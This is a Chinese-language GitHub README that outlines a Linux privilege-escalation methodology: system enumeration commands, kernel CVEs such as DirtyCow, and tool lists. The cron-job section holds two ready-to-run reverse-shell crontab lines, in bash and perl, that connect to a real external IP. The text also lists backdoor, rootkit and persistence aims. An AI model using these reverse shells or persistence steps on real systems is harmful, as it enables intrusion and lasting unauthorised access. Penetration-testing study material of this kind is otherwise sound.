Skip to content

KevolT/LinuxTQ

 
 

Repository files navigation

《Linux提权方法论》

LinuxTQ

本项目用来记录自己在学习研究Linux提权过程中遇到的一些内容,包括提权漏洞原理或方法工具等。Linux提权在后渗透过程中较为重要,尤其是对于权限维持至关重要。因此我们将会在此仓库持续更新Linux提权的相关内容!但提权有风险,提权需谨慎。不到非提不可的情况下千万不要尝试提权! 作者:0e0w

本项目创建于2020年9月29日,最近的一次更新时间为2023年2月22日。

01-Linux提权基础知识

本部分介绍Linux提权的一些基础内容。包括Linux的基础使用、相关发行版本以及Linux提权的相关概念等。

一、Linux命令基础

二、Linux用户权限

在Linux中一个文件有3种权限。对文件而言用户有3种不同类型:文件所有者、群组用户、其他用户。例如:chmod 777中,三个数字7分别对应上面三种用户,权限值都为7。

  • 文件权限:
    • r 只读
    • w 只写
    • x 执行

三、Linux内核版本

内核是系统的心脏,是运行程序和管理磁盘等硬件设备的核心程序。是硬件设备和软件程序间的抽象层。 Linux内核的开发和规范一直是由Linus领导的开发小组控制着,版本是惟一的。开发小组每隔一段时间公布新的版本或修订版,从1991年10月开始,Linus向世界公开发布的内核0.0.2版本到目前最新的内核5.911版本,Linux的功能越来越强大。

Linux内核的版本号命名是有一定规则的,版本号的格式通常为“主版本号.次版本号.修正号”。主版本号和次版本号标志着重要的功能变动,修正号表示较小的功能变更。以5.9.11版本为例,5代表主版本号,9代表次版本号,11代表修正号。其中次版本还有特定的意义:如果是偶数数字,就表示该内核是一个可以放心使用的稳定版;如果是奇数数字,则表示该内核加入了某些测试的新功能,是一个内部可能存在着bug的测试版。

四、Linux发行版本

从技术上来说,Linus开发的 Linux 只是一个内核。内核指的是一个提供设备驱动、文件系统、进程管理、网络通信等功能的系统软件,内核并不是一套完整的操作系统,它只是操作系统的核心。

一些组织或厂商将 Linux 内核与各种软件和文档包装起来,并提供系统安装界面和系统配置、设定与管理工具,就构成了 Linux 的发行版本。Linux 的发行版就是将 Linux 内核与应用软件做一个打包。

现在存在成千上万个Linux的发行版本。

  • Arch系列:Arch、Manjaro

  • RedHat系列:RedHat、CentOS、Fedora

  • Debian系列:Debian、Ubuntu、Deepin、Mint

  • SUSE系列:opebSUSE

  • 其他系列

五、Linux提权概念

特权提升(Privilege escalation)是指利用操作系统或应用软件中的程序漏洞、设计缺陷或配置疏忽来获取对应用程序或用户来说受保护资源的高级访问权限。其结果是,应用程序可以获取比应用程序开发者或系统管理员预期的更高的特权,从而可以执行授权的动作。

Linux提权一般是指获取root用户权限的操作过程。

六、Linux提权目的

提权操作有风险为什么还要进行提权?什么情况下需要进行提权?获取高权限之后可以做什么?

通过命令执行漏洞获取的一个反弹shell或是通过Web漏洞获取了一个Webshell后,一般情况下权限都较低。在执行一些重要敏感的操作或是对重要的文件进行修改时无法正常进行,便需要进行提权。Linux中安装的数据库、中间件等一般都不是以root用户启动的,通过数据库或是中间件获取到的权限是是低权限的。

获取root权限是每一个黑客的梦想。

  • 读取写入服务器中的重要文件:
    • 修改root密码
    • 替换系统命令
  • 在系统中放置更为隐蔽的后门:
    • ping后门
    • Rootkit
  • 保证服务器重启之后权限仍在:
    • 内存后门

七、Linux提权本质

Linux提权的本质一方面是信息收集,另一方面是对内核漏洞的掌握情况。

八、Linux信息收集

任何提权的第一步操作一定是对操作系统进行信息收集。提权是否成功的关键是信息收集是否完整。

  • 内核设备信息:

    • uname -a 打印所有可用的系统信息
    • uname -r 内核版本
    • uname -n 系统主机名。
    • uname -m 查看系统内核架构(64位/32位)
    • hostname 系统主机名
    • cat /proc/version 内核信息
    • cat /etc/*-release 分发信息
    • cat /etc/issue 分发信息
    • cat /proc/cpuinfo CPU信息
  • 用户和群组信息:

    • cat /etc/passwd 列出系统上的所有用户
    • cat /etc/group 列出系统上的所有组
    • grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' 列出所有的超级用户账户
    • whoami 查看当前用户
    • w 谁目前已登录,他们正在做什么
    • last 最后登录用户的列表
    • lastlog 所有用户上次登录的信息
    • lastlog -u %username% 有关指定用户上次登录的信息
    • lastlog |grep -v "Never" 以前登录用户的信息
  • 用户和权限信息:

    • whoami 当前用户名
    • id 当前用户信息
    • cat /etc/sudoers 谁被允许以root身份执行
    • sudo -l 当前用户可以以root身份执行操作
  • 环境系统变量信息:

    • env 显示环境变量
    • set 现实环境变量
    • echo %PATH 路径信息
    • history 显示当前用户的历史命令记录
    • pwd 输出工作目录
    • cat /etc/profile 显示默认系统变量
    • cat /etc/shells 显示可用的shell

02-Linux内核漏洞提权

Linux提权最主要的方式成功率最高最好的方式是利用内核漏洞进行提权操作。

一、CVE-2016-5195 大名鼎鼎的脏牛(DirtyCow)提权漏洞。官网:https://dirtycow.ninja

二、CVE-2019-13272

三、CVE-2017-16995

四、CVE-2019-14287

五、内核漏洞提权汇总

六、内核漏洞提权参考

03-Linux其他提权方法

一、抓取密码提权

二、计划任务提权

  • https://www.secice.cn/post/75fd4604
  • 利用原理:
    • 当 /bin/sh指向/bin/dash的时候(ubuntu默认这样,当前的靶机也是这样),反弹shell用bash的话得这样弹: * * * * * root bash -c "bash -i >&/dev/tcp/106.13.124.93/2333 0>&1" 这样弹shell的时候不知道为什么很慢,耐心等等
    • */1 * * * * root perl -e 'use Socket;$i="106.13.124.93";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

三、利用SUID提权

四、利用SUDO提权

Linux系统中可以使用sudo执行一个只有root才能执行的命令,配置文件保存在/etc/sudoers,sudo -l可以列出当前用户支持sudo的命令。

尽量从代码层面进行对漏洞的分析。

五、环境变量提权

六、root权限运行的服务

  • 以root的运行的服务,其中包括第三方软件都可以进行提权。

七、其他漏洞提权参考

04-Linux提权利用工具

一、本地扫描工具

二、内核漏洞查询

  • searchsploit

    • searchsploit linux 2.6 ubuntu priv esc
    • searchsploit Privilege Escalation
  • 其他工具

三、其他综合工具

05-Linux免杀高级提权

本部分对新手来说是难点。毕竟在安装了防护软件的Linux上进行提权操作需要一定的功力。但作为一个高级安全研究人员,应该时刻铭记,安全软件永远是一堆没用的废铁盒子!

一、Linux防护软件

二、免杀高级提权

  • 暂时略,待更新。

06-Linux内核高级后门

07-Linux提权环境靶场

08-Linux提权参考资料

Stargazers over time

About

《Linux提权方法论》

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published